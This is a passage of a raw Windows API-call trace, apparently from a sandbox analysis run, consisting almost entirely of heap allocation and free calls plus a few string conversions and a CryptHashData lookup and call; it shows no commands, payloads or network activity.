(HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d28 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0159.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0159.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0159.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0159.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0159.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0159.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54da8 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0159.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.040] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0159.041] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0159.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0159.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0159.041] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0159.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0159.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0159.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0159.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0159.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0159.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0159.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0159.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0159.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0159.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0159.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0159.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0159.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0159.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0159.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0159.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0159.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0159.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0159.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0159.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0159.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0159.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0159.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0159.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0159.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0159.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0159.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0159.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0159.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0159.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0159.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0159.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0159.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0159.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0159.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0159.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0159.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0159.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0159.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0159.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0159.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0159.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0159.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0159.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0159.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0159.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0159.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0159.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0159.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0159.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0159.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0159.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0159.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0159.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0159.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0159.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0159.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0159.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0159.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0159.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0159.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0159.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0159.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0159.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0159.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0159.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0159.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50c50 [0159.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0159.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0159.050] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0159.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0159.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0159.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0159.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0159.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0159.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0159.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0159.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0159.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0159.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0159.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0159.051] CryptHashData (hHash=0xa87310, pbData=0x2e54e18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0159.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0159.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0159.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0159.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0159.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0159.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0159.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0159.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0159.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0159.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0159.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0159.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0159.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0159.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0159.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0159.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0159.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0159.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0159.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0159.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0159.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0159.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0159.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0159.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0159.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0159.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0159.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0159.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0159.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0159.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0159.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0159.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0159.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 